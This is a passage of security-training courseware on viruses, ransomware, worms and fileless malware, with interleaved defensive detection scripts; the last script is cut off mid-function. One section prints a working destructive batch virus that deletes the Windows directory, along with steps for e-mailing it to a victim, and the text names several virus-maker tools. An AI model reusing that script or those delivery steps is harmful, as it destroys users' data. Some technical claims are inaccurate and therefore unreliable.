A logic bomb is a virus that is triggered by a response to an event, such as the launching of an application or when a specific date/time is reached, where it involves logic to execute the trigger. For example, cyber-criminals use spyware to covertly install a keylogger on your computer. The keylogger can capture keystrokes, such as usernames and passwords. The logic bomb is designed to wait until you visit a website that requires you to log in with your credentials, such as a banking site or social network. Consequently, the logic bomb will be triggered to execute the keylogger, capture your credentials, and send them to a remote attacker.
When a logic bomb is programmed to execute on a specific date, it is referred to as a time bomb. Time bombs are usually programmed to set off when important dates are reached, such as Christmas and Valentine's Day.

Web Scripting Viruses
A web scripting virus is a type of computer security vulnerability that breaches your web browser security through a website. This allows attackers to inject client-side scripting into the web page. It can bypass access controls and steal information from the web browser. Web scripting viruses are usually used to attack sites with large populations, such as sites for social networking, user reviews, and email. Web scripting viruses can propagate slightly faster than other viruses. A typical version of web scripting viruses is DDoS. It has the potential to send spam, damage data, and defraud users.
There are two types of web scripting viruses: non-persistent and persistent. Non-persistent viruses attack you without your knowledge. In the case of a persistent virus, your cookies are directly stolen, and the attacker can hijack your session, which allows the attacker to impersonate you and cause severe damage.
Prevention
The best ways to prevent these viruses and exploits are by safely validating untrusted HTML inputs, enforcing cookie security, disabling scripts, and using scanning services such as an antivirus program with real-time protection for your web browser. It is also beneficial to avoid unknown websites and use World of Trust to ensure that a site is safe. You would notice that you are infected with a web scripting virus if your searches are linked elsewhere and the background or homepage changes. The computer runs slowly and sluggishly, and programs may close randomly. Modern-day browsers have add-ons such as AdBlocker Plus, which allow users to prevent scripts from being loaded.
E-mail Viruses

An e-mail virus refers to computer code sent to you as an e-mail attachment, which, if activated, will result in some unexpected and usually harmful effects, such as destroying specific files on your hard disk and causing the attachment to be emailed to everyone in your address book. Email viruses perform a wide variety of activities, from creating pop-ups to crashing systems or stealing personal data. Such viruses also vary in terms of how they are presented. For example, a sender of an email virus may be unknown to a user, or a subject line may be filled with nonsense. In other cases, a hacker may cleverly disguise an email to appear as if it is from a trusted or known sender.
To avoid email virus attacks, you should never open (or double-click on) an e-mail attachment unless you know who sent it and what the attachment contains; in addition, you must install and use antivirus software to scan any attachment before you open it.
Armored Viruses

Armored viruses are viruses that are designed to confuse or trick deployed antivirus systems to prevent them from detecting the actual source of the infection. These viruses make it difficult for antivirus programs to trace the actual source of the attack. They trick antivirus programs by showing some other location even though they are actually on the system itself.
The basic techniques adopted by armored viruses are as follows:
= Anti-disassembly
Anti-disassembly is a technique that uses specially crafted code or data in a program to produce an incorrect program listing by disassembly analysis tools.
= Anti-debugging
Anti-debugging techniques are used to ensure that the program is not running under the debugger. This can slow down the process of reverse engineering, but it cannot be prevented.
= Anti-heuristics
Anti-heuristics are used in machine code to prevent heuristic analysis, and they rely on the program's ability to protect itself from programmer and debugger intervention.
= Anti-emulation
Anti-emulation techniques are used to avoid dynamic analysis by fingerprinting the emulated system environment; they can also secure intellectual property against emulation-assisted reverse engineering.
= Anti-goat
Anti-goat techniques use heuristic rules to detect possible goat files, such as a virus that cannot infect a file if it is too small or if it contains a large amount of do-nothing instructions. Anti-goat viruses require more time for analysis.

Add-on Viruses

Add-on viruses append their code to the host code without making any changes to the latter, or relocate the host code to insert their code at the beginning.

Figure 7.48: Working of add-on virus

Intrusive Viruses

Intrusive viruses overwrite the host code completely or partly with the viral code.

Figure 7.49: Working of intrusive virus

Direct Action or Transient Viruses

Direct action or transient viruses transfer all of the controls of the host code to where it resides in the memory. It selects the target program to be modified and corrupts it. The life of a transient virus is directly proportional to the life of its host. Therefore, a transient virus executes only upon the execution of its attached program and terminates upon the termination of its attached program. At the time of execution, the virus may spread to other programs. This virus is transient or direct, as it operates only for a short period and goes directly to the disk to search for programs to infect.
Terminate and Stay Resident (TSR) Viruses

A terminate and stay resident (TSR) virus remains permanently in the target machine's memory during an entire work session, even after the target host's program is executed and terminated. The TSR virus remains in memory and therefore has some control over the processes. In general, the TSR virus incorporates interrupt vectors into its code so that when an interrupt occurs, the vector directs execution to the TSR code. If the TSR virus infects the system, the user needs to reboot the system to remove the virus without a trace.
The following steps are employed by TSR viruses to infect files:
= Gets control of the system
= Assigns a portion of memory for its code
= Transfers and activates itself in the allocated portion of memory
= Hooks the execution of code flow to itself
= Starts replicating to infect files


Ransomware

Ransomware is a type of malware that restricts access to the infected computer system or critical files and documents stored on it, and then demands an online ransom payment to the malware creator(s) to remove user restrictions. Ransomware might encrypt files stored on the system's hard disk or merely lock the system and display messages meant to trick the user into paying the ransom.
Usually, ransomware spreads as a Trojan, entering a system through email attachments, hacked websites, infected programs, app downloads from untrusted sites, vulnerabilities in network services, and so on. After execution, the payload in the ransomware runs and encrypts the victim's data (files and documents), which can be decrypted only by the malware author. In some cases, user interaction is restricted using a simple payload.
In a web browser, a text file or webpage displays the ransomware demands. The displayed messages appear to be from companies or law enforcement personnel falsely claiming that the victim's system is being used for illegal purposes or contains illegal content (e.g., porn videos, pirated software), or it could be a Microsoft product activation notice falsely claiming that installed Office software is fake and requires product re-activation. These messages entice victims into paying money to undo the restrictions imposed on them. Ransomware leverages victims' fear, trust, surprise, and embarrassment to get them to pay the ransom demanded.
Ransomware Families
Some additional ransomware families are as follows:
= Cerber
= CTB-Locker
= Sodinokibi
= BitPaymer
= CryptXXX
= CryptorBit
= CryptoLocker
= CryptoDefense
= CryptoWall
= Police-themed Ransomware
Examples of Ransomware
= Dharma
Dharma is a dreadful ransomware that was first identified in 2016; since then, it has been affecting various targets across the globe with new versions. It has been regularly updated with sophisticated mechanisms in recent years. At the end of March 2019, Dharma struck a parking lot system in Canada. Previously, it also infected a Texas hospital and some other organizations. The variants of this ransomware have the following extensions: .adobe, .bip, .combo, .cezar, .ETH, .java. Its encrypted files have new extensions, such as .xxxxx and .like. This ransomware employs an AES encryption algorithm to encrypt data and then displays ransom notes. These ransom notes are named either Info.hta or FILES ENCRYPTED.txt. This ransomware is carried out through email campaigns. The ransom notes ask victims to contact the threat actors via the provided email address and pay in bitcoins for the decryption service.
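The Dharma description above names two file-system artifacts a responder can look for: the ransom note file names and the extensions appended to encrypted files. The block below is an added example, not code from the courseware or from EC-Council, that triages a file listing on those indicators. The sample listing is constructed; the exact way Dharma renames files is not given on the page, so the sample names simply end in one of the listed extensions. Treating .java as a weak signal (it is also the normal extension of Java source files) and the minimum-hit threshold are this example's own assumptions.

```python
import os
from typing import Optional

# Indicators from the Dharma description above. The note name is listed both with
# and without the space because the page's text runs the two words together.
DHARMA_NOTE_NAMES = {"info.hta", "files encrypted.txt", "filesencrypted.txt"}
DHARMA_EXTENSIONS = {".adobe", ".bip", ".combo", ".cezar", ".eth", ".java", ".xxxxx", ".like"}
# .java is also the ordinary extension of Java source files, so on its own it is
# only a weak indicator (assumption made for this example).
AMBIGUOUS_EXTENSIONS = {".java"}


def classify(path: str) -> Optional[str]:
    """Label one path as a ransom note, a strong or weak renamed-file indicator, or None."""
    name = os.path.basename(path).lower()
    if name in DHARMA_NOTE_NAMES:
        return "note"
    ext = os.path.splitext(name)[1]
    if ext in AMBIGUOUS_EXTENSIONS:
        return "weak"
    if ext in DHARMA_EXTENSIONS:
        return "strong"
    return None


def scan_listing(paths, min_strong: int = 3) -> dict:
    """Triage a file listing: a ransom note, or at least min_strong files carrying a
    Dharma extension, marks the location as suspected; weak hits are only reported."""
    buckets = {"note": [], "strong": [], "weak": []}
    for p in paths:
        label = classify(p)
        if label:
            buckets[label].append(p)
    suspected = bool(buckets["note"]) or len(buckets["strong"]) >= min_strong
    return {
        "ransom_notes": buckets["note"],
        "renamed_files": buckets["strong"],
        "weak_indicators": buckets["weak"],
        "suspected": suspected,
    }


# Constructed listing of a file share after an incident (sample data, not real paths).
SAMPLE_LISTING = [
    "/srv/share/Info.hta",
    "/srv/share/FILES ENCRYPTED.txt",
    "/srv/share/budget.xlsx.adobe",
    "/srv/share/plan.docx.adobe",
    "/srv/share/notes.txt",
    "/srv/src/Main.java",
]

if __name__ == "__main__":
    print(scan_listing(SAMPLE_LISTING))
```

The note file is the higher-confidence indicator: a ransom note has no benign reason to exist, while an extension match must be read against what the directory normally holds, which is why a source tree full of .java files does not by itself raise the suspected flag.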

Figure 7.50: Screenshot displaying ransom demand message of Dharma ransomware

= eCh0raix

eCh0raix is a new ransomware that specifically targets Linux devices with QNAP network-attached storage (NAS). It infects and encrypts the victim's machine using the AES encryption technique. This malware was developed using the Go programming language, and it has a very limited number of code lines, i.e., 400. Once the malware infects the system, it communicates with its malicious C2C server via Tor networks/SOCKS5 proxy servers and then initiates the encryption process.

Figure 7.51: Screenshot displaying ransom demand message of eCh0raix ransomware
▪ SamSam
SamSam is a notorious ransomware that infected millions of unpatched servers in 2018. It was first discovered in 2016; however, it was considered a grave ransomware after the WannaCry attack due to its vast victim base in 2018. SamSam employs the RSA-2048 asymmetric encryption technique to encrypt the acquired local files in the infected systems. Unlike other ransomware, this ransomware does not attack victims randomly. This is a targeted ransomware, which specifically targets certain reputed companies. In spite of knowing this, large multinational companies were unable to defend themselves from such attacks. The attack technique employed by this ransomware is also different from that employed by other ransomware. Nearly all ransomware uses spam emails to propagate and perform attacks; however, SamSam employs brute-force tactics against weak passwords of the Remote Desktop Protocol (RDP).
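SamSam's RDP password guessing is visible in the Windows Security log as a burst of failed logons (event 4625 with logon type 10, RemoteInteractive) from one source address, often followed by a success (event 4624) once a weak password is found. The following detection logic is an added example, not part of the CEH courseware: it runs over constructed sample events written in a simplified key=value form (real events are EVTX/XML and would need a parser), and the threshold of five failures within two minutes is an assumed tuning value, not a published rule.

```python
"""Flag RDP password brute-forcing from Windows Security log events.

Added example; the event lines below are constructed, not real telemetry.
LogonType 10 is RemoteInteractive (RDP). FAIL_THRESHOLD and WINDOW are
assumed tuning values.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (simplified key=value rendering of 4625/4624).
SAMPLE_EVENTS = """\
2020-03-01T10:00:01 EventID=4625 LogonType=10 TargetUser=administrator SrcIP=203.0.113.5
2020-03-01T10:00:02 EventID=4625 LogonType=10 TargetUser=administrator SrcIP=203.0.113.5
2020-03-01T10:00:03 EventID=4625 LogonType=10 TargetUser=admin SrcIP=203.0.113.5
2020-03-01T10:00:04 EventID=4625 LogonType=10 TargetUser=backup SrcIP=203.0.113.5
2020-03-01T10:00:05 EventID=4625 LogonType=10 TargetUser=administrator SrcIP=203.0.113.5
2020-03-01T10:00:06 EventID=4625 LogonType=10 TargetUser=administrator SrcIP=203.0.113.5
2020-03-01T10:00:09 EventID=4624 LogonType=10 TargetUser=administrator SrcIP=203.0.113.5
2020-03-01T10:05:00 EventID=4625 LogonType=10 TargetUser=jsmith SrcIP=198.51.100.7
2020-03-01T10:30:00 EventID=4625 LogonType=2 TargetUser=jsmith SrcIP=-
"""

FAIL_THRESHOLD = 5              # failures from one source IP ...
WINDOW = timedelta(minutes=2)   # ... within this sliding window (assumed values)


def parse_event(line):
    """Turn one constructed log line into a dict with a datetime 'ts'."""
    ts, *fields = line.split()
    ev = dict(f.split("=", 1) for f in fields)
    ev["ts"] = datetime.fromisoformat(ts)
    return ev


def detect_rdp_bruteforce(text, threshold=FAIL_THRESHOLD, window=WINDOW):
    """Return {src_ip: {"failures": n, "users": [...], "success_after": bool}}.

    Only RemoteInteractive (LogonType 10) events are considered. A 4624 that
    lands inside the window right after a flagged burst is marked, because a
    success after many failures usually means a password was guessed.
    """
    events = [parse_event(l) for l in text.splitlines() if l.strip()]
    events.sort(key=lambda e: e["ts"])
    fails = defaultdict(list)   # ip -> [(ts, user)] of recent 4625s
    findings = {}
    for ev in events:
        if ev["LogonType"] != "10":
            continue
        ip = ev["SrcIP"]
        if ev["EventID"] == "4625":
            fails[ip].append((ev["ts"], ev["TargetUser"]))
            # drop failures that fell out of the sliding window
            fails[ip] = [(t, u) for t, u in fails[ip] if ev["ts"] - t <= window]
            if len(fails[ip]) >= threshold:
                f = findings.setdefault(ip, {"failures": 0, "users": set(),
                                             "success_after": False})
                f["failures"] = max(f["failures"], len(fails[ip]))
                f["users"].update(u for _, u in fails[ip])
        elif ev["EventID"] == "4624" and ip in findings and fails[ip]:
            last_fail = fails[ip][-1][0]
            if ev["ts"] - last_fail <= window:
                findings[ip]["success_after"] = True
    return {ip: {**f, "users": sorted(f["users"])} for ip, f in findings.items()}


if __name__ == "__main__":
    for ip, f in detect_rdp_bruteforce(SAMPLE_EVENTS).items():
        print(f"{ip}: {f['failures']} RDP failures, users={f['users']}, "
              f"success_after_burst={f['success_after']}")
```

On the sample, only 203.0.113.5 is flagged (six failures across three accounts, then a success three seconds later); the single failure from 198.51.100.7 and the local console failure (logon type 2) are ignored. The "success after burst" flag is the one to page on, since it means the account is already in the attacker's hands.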

Figure 7.52: Screenshot displaying ransom demand message of SamSam ransomware
Some additional ransomware are as follows:
▪ WannaCry
▪ Petya-NotPetya
▪ GandCrab
▪ MegaCortex
▪ LockerGoga
▪ NamPoHyu
▪ Ryuk
▪ Cryptghost
How to Infect Systems Using a Virus: Creating a Virus
A virus can be created in two different ways:
▪ Writing a Virus Program
▪ Using Virus Maker Tools (e.g., DELmE's Batch Virus Maker, JPS Virus Maker)

How to Infect Systems Using a Virus
Attackers can infect systems using a virus in the following steps:
▪ Creating a Virus
▪ Propagating and Deploying a Virus

Creating a Virus
A virus can be created in two ways: writing a virus program, and using virus maker tools.
▪ Writing a Simple Virus Program
The following steps are involved in writing a simple virus program:
1. Create a batch file Game.bat with the following text:

       @echo off
       for %%f in (*.bat) do copy %%f + Game.bat
       del c:\Windows\*.*

2. Convert the Game.bat batch file into Game.com using the bat2com utility.
3. Send the Game.com file as an email attachment to the victim.
4. When Game.com is executed by the victim, it appends itself to all the .bat files in the current directory on the target machine and deletes all the files in the Windows directory.
▪ Using Virus Maker Tools
Virus maker tools allow you to customize and craft your virus into a single executable file. The nature of the virus depends on the options available in the virus maker tool. Once the virus file is built and executed, it can perform the following tasks:
  ○ Disable Windows command prompt and Windows Task Manager
  ○ Shut down the system
  ○ Infect all executable files
  ○ Inject itself into the Windows registry and start up with Windows
  ○ Perform non-malicious activity such as unusual mouse and keyboard actions
The following tools are useful for testing the security of your own antivirus software.
  ○ DELmE's Batch Virus Maker
  DELmE's Batch Virus Generator is a virus creation program with many options to infect the victim's PC, such as formatting the C: drive, deleting all the files in the hard disk drive, disabling admin privileges, cleaning the registry, changing the homepage, killing tasks, and disabling/removing the antivirus and firewall.
  ○ JPS Virus Maker
  JPS Virus Maker is a tool used to create customized viruses. It has many in-built options to create a virus. Some of the features of this tool are auto-startup, enable remote desktop, disable task manager, disable control panel, turn off Windows Defender, etc.
Figure 7.54: Screenshot of JPS Virus Maker
Some additional virus maker tools are as follows:
▪ Bhavesh Deadly Virus Maker
▪ SKW Virus Maker
▪ SonicBat Batch Virus Maker
▪ TeraBIT Virus Maker
▪ Andreinick05's Batch Virus Maker
How to Infect Systems Using a Virus: Propagating and Deploying a Virus

Propagating and Deploying a Virus
After creating viruses, attackers can adopt various virus propagation and deployment techniques to transfer the virus to the victim's machine. Some of these techniques are as follows:
▪ Virus Hoaxes
▪ Fake Antivirus

Virus Hoaxes
Techniques such as virus hoaxes and fake antivirus software are widely used by attackers to introduce viruses into victims' systems.
Virus hoaxes can be nearly as harmful as real viruses in terms of loss of productivity and bandwidth while naive users react to them and forward them to other users. Because viruses tend to create considerable fear, they have become a common subject of hoaxes. Virus hoaxes are false alarms claiming reports of nonexistent viruses.
The following are some critical features of virus hoaxes:
▪ These warning messages, which can be propagated rapidly, state that a particular e-mail message should not be opened, and that doing so would damage one's system.
▪ In some cases, these warning messages themselves contain virus attachments.
▪ Try to cross-check the identity of the person who has posted the warning.
It is a good practice to look for technical details in any message concerning viruses. Furthermore, search for information on the Internet to learn more about hoaxes, especially by scanning bulletin boards on which people actively discuss current community happenings/concerns. Before jumping to conclusions by reading Internet information, first check the following:
▪ If the information is posted by newsgroups that are suspicious, cross-check the information with another source.
▪ If the person who has posted the news is not an expert or a known person in the community, cross-check the information with another source.
▪ If a government body has posted the news, the posting should also have a reference to the corresponding federal regulation.
▪ One of the most effective checks is to look up the suspected hoax virus by name on antivirus software vendor sites.
Google Critical Security Alert Scam:
In 2018, a massive hoax campaign was launched, in which threat actors spread Google Critical Security Alert messages to victims. Google Critical Security Alert is a service provided by Google to notify its users regarding any activity related to their accounts. The activities can include logging in, changing passwords, changing personal information, etc. Attackers create and send fake alert emails to victims, thereby notifying them that the aforementioned activities have taken place. On seeing the critical alert email, the user clicks the link provided in the email and subsequently gets infected. The figure below shows a hoax email stating "New device signed in to." Looking at this email without checking the email source, the victim clicks the "CHECK ACTIVITY" button and gets trapped.

Figure 7.55: Screenshot of Google Critical Security Alert Scam
Some additional virus hoaxes are as follows:
▪ AppleCare
▪ Chrome critical error
▪ Bangkok Earthquake 8.5 video
Fake Antivirus
Fake or rogue antivirus software is a form of Internet fraud based on malware. It appears and performs similarly to a real antivirus program. Fake antivirus software is often displayed in banner ads, pop-ups, email links, and search engine results when searching for antivirus software. A well-designed fake antivirus software looks authentic and often encourages users to install it on their systems, perform updates, or remove viruses and other malicious programs.
Upon clicking the ad, pop-up, or link to install the antivirus software, users are redirected to another page where they are prompted to buy or subscribe to that antivirus software by entering their payment details. Fake antivirus software can cause severe damage to systems once downloaded and installed; e.g., they infect systems with malicious software, steal sensitive information (e.g., passwords, bank account numbers, credit card data), and corrupt
At present, a new fake antivirus trend has emerged. Fake antivirus tools are rapidly proliferating in the mobile application space. According to AV-Comparatives research, two-thirds of all antivirus applications present in the Android Play Store are fake.
▪ Free Antivirus 2019
Free Antivirus 2019 is a fake Android antivirus application. It claims to eliminate viruses and other malware from mobile devices. However, when it is itself scanned, it is flagged as Medium Risk, as shown in the screenshot below.
Figure 7.56: Screenshot of Antivirus Pro 2017 Fake Antivirus
Some additional fake antivirus programs are as follows:
▪ AntiVirus Pro 2017
▪ PC Secure System Antivirus
▪ TotalAV 10
Computer Worms

Computer Worms
Computer worms are standalone malicious programs that replicate, execute, and spread across network connections independently without human intervention. Intruders design most worms to replicate and spread across a network, thus consuming available computing resources and, in turn, causing network servers, web servers, and individual computer systems to become overloaded and stop responding. However, some worms also carry a payload to damage the host system.
Worms are a subtype of viruses. A worm does not require a host to replicate; however, in some cases, the worm's host machine is also infected. Initially, black hat professionals treated worms as a mainframe problem. Later, with the introduction of the Internet, they mainly focused on and targeted the Windows OS using the same worms by sharing them via e-mail, IRC, and other network functions.
Attackers use worm payloads to install backdoors on infected computers, which turns them into zombies and creates a botnet. Attackers use these botnets to initiate further cyber-attacks.
Some of the latest computer worms are as follows:
▪ Monero
▪ Bondat
▪ Beapy
How is a Worm Different from a Virus?

Virus | Worm
A virus infects a system by inserting itself into a file or executable program. | A worm infects a system by exploiting a vulnerability in an OS or application and replicating itself.
It might delete or alter the content of files or change the location of files in the system. | Typically, a worm does not modify any stored programs; it only exploits the CPU and memory.
It alters the way a computer system operates without the knowledge or consent of a user. | It consumes network bandwidth, system memory, etc., excessively overloading servers and computer systems.
A virus cannot spread to other computers unless an infected file is replicated and sent to the other computers. | A worm can replicate itself and spread using IRC, Outlook, or other applicable mailing programs after installation in a system.
A virus spreads at a uniform rate, as programmed. | A worm spreads more rapidly than a virus.
Viruses are difficult to remove from infected machines. | Compared with a virus, a worm can be removed easily from a system.
Table 7.4: Difference between virus and worm
Worm Makers

Worm Makers
Worm makers are tools that are used to create and customize computer worms to perform malicious tasks. These worms, once created, spread independently over networks and poison entire networks. With the help of pre-defined options in the worm makers, a worm can be designed according to the task it is intended to execute.
▪ Internet Worm Maker Thing
Internet Worm Maker Thing is an open-source tool used to create worms that can infect a victim's drives and files, show messages, disable antivirus software, etc. This tool comes with a compiler that can easily convert your batch virus into an executable to evade antivirus software or for any other purpose.
Figure 7.57: Screenshot of Internet Worm Maker Thing
Some worm makers are as follows:
▪ Batch Worm Generator
▪ C++ Worm Generator
Module Flow
▪ Malware Concepts
▪ Fileless Malware Concepts
▪ Malware Analysis
▪ Trojan Concepts
▪ Countermeasures
▪ Virus and Worm Concepts
▪ Anti-Malware Software

Fileless Malware Concepts
Nowadays, fileless malware is becoming a popular method of attack by cyber-criminals because of the inconspicuous characteristics of such malware as well as its ability to evade common security controls. As fileless malware can easily evade various security controls, organizations need to focus on monitoring, detecting, and preventing malicious activities instead of relying only on traditional approaches such as scanning for malware through file signatures. This section discusses various concepts related to fileless malware.
What is Fileless Malware?

What is Fileless Malware?
Fileless malware, also called non-malware, infects legitimate software, applications, and other protocols existing in the system to perform various malicious activities. This type of malware leverages existing vulnerabilities to infect the system. It generally resides in the system's RAM. It injects malicious code into running processes such as Microsoft Word, Flash, Adobe PDF Reader, JavaScript, PowerShell, .NET, malicious Macros, and Windows Management Instrumentation (WMI).
Fileless malware does not depend on files and leaves few traces on disk, thereby making it difficult to detect and remove using traditional anti-malware solutions. Therefore, such malware is highly resistant to disk-based computer forensics techniques. It mostly resides in volatile memory locations such as running processes, the system registry, and service areas. Once the fileless malware gains access to the target system, it can exploit system administration tools and processes to maintain persistence, escalate privileges, and move laterally across the target network. Attackers use such malware to steal critical data from the system, install other types of malware, or inject malicious scripts that automatically execute with every system restart to continue the attack.
The various reasons for using fileless malware in cyber-attacks are as follows:
▪ Stealth: Fileless malware exploits legitimate system tools; hence, it is extremely difficult to detect, block, or prevent fileless attacks.
▪ LOL (Living-off-the-land): System tools exploited by fileless malware are already installed in the system by default. An attacker does not need to create and install custom tools on the target system.
▪ Trustworthy: The system tools used by fileless malware are the most frequently used and trusted tools; hence, security tools incorrectly assume that such tools are running for a legitimate purpose.
Fileless Techniques used by Attackers
▪ Phishing emails: Attackers use phishing emails embedded with malicious links or downloads, which, when clicked, inject and run malicious code in the victim's memory.
▪ Legitimate applications: Attackers exploit legitimate system packages installed in the system, such as Word and JavaScript, to run the malware.
▪ Native applications: Operating systems such as Windows include pre-installed tools such as PowerShell and Windows Management Instrumentation (WMI). Attackers exploit these tools to install and run malicious code.
▪ Infection through lateral movement: Once the fileless malware infects the target system, attackers use this system to move laterally in the network and infect other systems connected to the network.
▪ Malicious websites: Attackers create fraudulent websites that appear legitimate. When a victim visits such a website, it automatically scans the victim's system to detect vulnerabilities in plugins that can be exploited by the attackers to run malicious code in the browser's memory.
▪ Registry manipulation: Attackers use this technique to inject and run malicious code directly from the Windows registry through a legitimate system process. This helps attackers to bypass UAC, application whitelisting, etc., and also infect other running processes.
▪ Memory code injection: Attackers use this technique to inject malicious code and maintain persistence in the process memory of the running process with the aim of propagating and re-injecting it into other legitimate system processes that are critical for normal system operation. This helps in bypassing regular security controls. The various code injection techniques used by attackers include local shellcode injection, remote thread injection, process hollowing, etc.
▪ Script-based injection: Attackers often use scripts in which the binaries or shellcode are obfuscated and encoded. Such script-based attacks might not be completely fileless. The scripts are often embedded in documents sent as email attachments.
Taxonomy of Fileless Malware Threats

Taxonomy of Fileless Malware Threats
Source: https://docs.microsoft.com
As shown in the figure below, fileless malware threats are divided into different categories:
Figure 7.58: Taxonomy of fileless malware threats
Fileless malware can be categorized based on their point of entry, i.e., how the malware creates an entry point into the target system. Fileless malware enters the target system through an exploit, through compromised hardware, or by the normal execution of applications or scripts. According to the above categorization, fileless malware threats are of three types based on how much evidence they leave on the victim's machine:
▪ Type 1: No File Activity Performed
This type of malware never requires writing a file onto the disk. An example of such an infection is receiving malicious packets that exploit a vulnerability in a target host and automatically install a backdoor in the kernel memory. Another example may involve malicious code embedded within the compromised device's firmware. Anti-malware solutions are generally not capable of checking a device's firmware. Hence, it is extremely difficult to detect and prevent such threats.
▪ Type 2: Indirect File Activity
This type of malware achieves a fileless presence on the target machine without writing files directly; its persistence, however, ends up in a file-backed store. For example, an attacker can inject a malicious PowerShell command into the WMI repository to configure a filter that executes periodically.
▪ Type 3: Required Files to Operate
This type of malware requires files to operate, but it does not execute attacks from those files directly. For example, an attacker exploits a document with an embedded macro, Java/Flash file, or EXE file to inject malicious payloads into the target host and then maintains persistence without using any files.
Classification of fileless malware threats based on their point of entry:
▪ Exploits
Exploits can be either file-based or network-based. File-based malware exploits the system executables, Flash, Java, documents, etc., to run a shellcode that injects a malicious payload into the memory. This type of malware uses files to make an initial entry into the target machine. Network-based malware exploits vulnerabilities in network communication protocols such as SMB to deliver malicious payloads.
▪ Hardware
Device-based malware infects the firmware residing on network cards and hard disks to deliver the malicious payload. CPU-based malware exploits firmware used for management operations to execute malicious code within the CPU. USB-based malware rewrites the USB firmware with malicious code that directly interacts with the operating system and installs a malicious payload on the target machine. Similarly, fileless malware can also exploit BIOS-based firmware or perform hypervisor-based attacks that exploit virtual machines.
▪ Execution and Injection
This type of malware can be file-based, macro-based, script-based, or disk-based. File-based malware exploits executables, DLLs, LNK files, etc., to inject a malicious payload into the process memory or other legitimate running processes. Using macro-based malware, attackers trick victims into clicking malicious links that execute macros automatically to inject a malicious payload into the process memory. Attackers implement script-based malware if they gain an initial footprint on the target system. The attacker injects a malicious payload by running a malicious script on the command prompt. Disk-based malware rewrites the boot record with malicious code, which, when executed, gains access and installs the malicious payload.
How does Fileless Malware Work?

How does Fileless Malware Work?
A fileless malware attack generally consists of several stages: point of entry, code execution, persistence, and achieving objectives.
▪ Point of Entry
  ○ Memory Exploits: Fileless malware uses a variety of techniques to inject and execute itself in the process memory of a legitimate system process. It exploits the memory and privileges of whitelisted system tools such as Windows Management Instrumentation (WMI), PowerShell, cmd.exe, PsExec, etc.
  ○ Malicious Website: Fileless threats may also arrive from exploit-hosting websites that appear to be legitimate business pages. When the user visits the page, the exploit kit starts scanning for vulnerabilities, such as any outdated Flash or Java plugins. If successful, it invokes Windows native tools such as PowerShell to download and execute the payload directly in memory without writing any files to the disk.
  Fileless malware can also exploit script-based programs such as PowerShell, Macros, JavaScript, and VBScript. The initial script might be used for code injection or to connect to other malicious sites to download more binaries/scripts to deliver the actual payload.
  ○ Phishing Email/Malicious Documents: Attackers can also embed malicious macros in the form of VBScript or JavaScript in a Microsoft Office document (Word, PowerPoint, Excel) or PDF, and further use social engineering techniques to get users to run the macros on their systems. Here, the attack initiates with a document or file but transforms into a fileless threat when the malicious script is executed from memory using whitelisted tools such as PowerShell.
▪ Code Execution
  ○ Code Injection: Fileless threats can use various code injection techniques such as process hollowing and reflective DLL injection, which directly load the shellcode into memory without writing any file to disk.
  ○ Script-based Injection: Fileless malware often comes embedded in a document as an email attachment. Once the document is opened, the malicious script runs in memory, thus turning into a fileless operation. The script then invokes whitelisted applications, such as PowerShell, mshta.exe, JavaScript, WScript, and VBScript, to connect to one or more malicious websites to download additional scripts to deliver the actual payload. All these operations occur in memory, which makes it difficult for traditional anti-malware solutions to detect them.
▪ Persistence
In general, fileless malware is not persistent in nature. As it is memory-based, restarting the system would remove the malicious code from memory and stop the infection. However, depending on the goal of the attacker, malicious scripts can be stored in various Windows built-in tools and utilities such as the Windows registry, WMI, and Windows Task Scheduler, and be set to run even after a system reboot.
  ○ Windows Registry: Attackers can store the malicious scripts in the Windows AutoStart registry keys so that they are loaded and executed whenever the machine is restarted.
  ○ Windows Management Instrumentation (WMI): Fileless malware also abuses WMI, which is commonly used for automating system administration tasks, to achieve and maintain persistence. In this case, attackers store the malicious scripts in the WMI repository, where they are periodically triggered via WMI event filter-to-consumer bindings.
  ○ Windows Task Scheduler: Using the task scheduler, attackers can set malicious scripts to be automatically triggered and executed at a chosen time interval.
▪ Achieving Objectives
By maintaining persistence, attackers bypass security solutions and achieve a variety of objectives, such as data exfiltration, credential stealing, reconnaissance, and cyber spying, on the target systems and network.
Launching Fileless Malware through Document Exploits and In-Memory Exploits

Launching Fileless Malware through Document Exploits
An attacker can trick users into downloading documents, archives, PDFs, or other attractive files containing malicious macro code, which are sent via phishing emails or accepted via social engineering tricks. Once the file is opened, the malicious macro launches VBA (Visual Basic) or JavaScript to exploit the Windows default tools such as PowerShell. Then, the malicious script uses PowerShell to run additional code or a payload to continue the infection without being traced.
The malicious script can either exploit PowerShell to get access to local storage files to run executables or simply execute the malicious payload in memory. Once the malicious code or payload inside the document is successfully executed, it disguises itself as a legitimate dropper or downloader to continue the chain of infection that can be leveraged by an attacker to launch further attacks.
A fileless malware can be launched through document exploits in the following steps:
1. The victim is tricked into downloading/running a malicious document
2. The document runs a malicious macro
3. The malicious macro launches VBA or JavaScript
4. The malicious script exploits PowerShell to run additional code (payload) to spread the infection to other running processes or systems
Figure 7.60: Launching Fileless Malware through Document Exploits
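A mail gateway or EDR can short-circuit steps 1 and 2 above by checking whether an Office attachment carries a VBA project at all, before any user gets to click "Enable Content". The following is an added example, not part of the CEH courseware: OOXML files (.docx, .docm, .xlsm, ...) are ZIP containers in which a macro project is stored as word/vbaProject.bin (xl/vbaProject.bin for Excel) and declared in [Content_Types].xml with the content type application/vnd.ms-office.vbaProject. The sample documents are constructed in memory and hold a placeholder instead of real macro code; the file layout is minimal and not a valid Word document.

```python
"""Detect VBA projects inside OOXML attachments (added example).

OOXML is a ZIP container; a macro project appears as .../vbaProject.bin and
is declared in [Content_Types].xml. The sample containers below are
constructed in memory with placeholder content, not real macros.
"""
import io
import zipfile

VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"


def inspect_ooxml(data, filename):
    """Return a dict of macro indicators for the given file bytes and name."""
    result = {"is_ooxml": False, "has_vba_part": False,
              "declares_vba": False, "extension_mismatch": False}
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return result                      # not a ZIP, so not OOXML
    names = zf.namelist()
    if "[Content_Types].xml" not in names:
        return result                      # a ZIP, but not an OOXML package
    result["is_ooxml"] = True
    # the VBA project part, wherever the application stores it (word/, xl/, ppt/)
    result["has_vba_part"] = any(n.lower().endswith("vbaproject.bin") for n in names)
    ctypes = zf.read("[Content_Types].xml").decode("utf-8", "replace")
    result["declares_vba"] = VBA_CONTENT_TYPE in ctypes
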